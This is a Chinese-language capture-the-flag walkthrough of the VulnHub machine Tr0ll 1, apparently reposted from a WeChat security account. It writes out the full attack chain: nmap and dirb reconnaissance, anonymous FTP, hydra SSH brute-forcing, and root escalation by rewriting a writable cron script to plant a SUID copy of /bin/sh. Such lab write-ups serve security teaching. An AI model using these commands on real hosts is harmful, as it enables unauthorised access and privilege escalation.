虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/虚拟机简介:从 /root 目录获取 Proof.txt目标:1个flag级别:初级
1、信息收集
1.1 主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
1.2 服务探测
1.通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.148
查看开放21、22、80端口
2、渗透测试
2.1 WEB渗透
1.访问站点进行测试
2.网站测试
dirb http://192.168.207.148
发现一个目录比较可疑
没有发现有用信息
3.测试FTP服务
根据nmap扫描结果,允许Anonymous登录
登录ftp服务
ftp 192.168.207.148
dir
查看存在lol.pcap数据包
4.下载数据包并分析
get lol.pcap
bye
查看第一个TCP流为FTP登录信息
查看第三个流提示有一个特殊字符
5.访问站点测试
http://192.168.207.148/sup3rs3cr3tdirlol/
查看站点存在一个文件
6.下载文件并分析
wget http://192.168.207.148/sup3rs3cr3tdirlol/roflmao
file roflmao
查看文件为ELF可执行文件
7.测试执行文件
chmod 777 roflmao
./roflmao
通过提示的字符访问站点
8.获取目录内容
在good_luck目录中查看文件如下
在另外一个文件夹中提示密码文件
9.爆破SSH测试
wget http://192.168.207.148/0x0856BF/good_luck/which_one_lol.txt
wget http://192.168.207.148/0x0856BF/this_folder_contains_the_password/Pass.txt
删除which_one_lol.txt中第5行,作为用户名字典,使用Pass.txt作为密码字典
hydra -L which_one_lol.txt -p Pass.txt 192.168.207.148 ssh
获取到SSH用户名和密码
2.2 主机渗透
1.登录主机
2.查找可以写入文件
find / -writable 2<dev/null
ls -lah /lib/log/cleaner.py
查看文件所有者均为root账号,并且其他用户有读写权限
3.查看文件内容
定期删除/tmp目录下的缓存文件
修改py脚本,并以root身份添加SUID权限
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
4.执行提权操作
cd /tmp
./sh
查看sh文件存在suid权限
5.查看flag信息
cd /root
cat proof.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Tr0ll 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论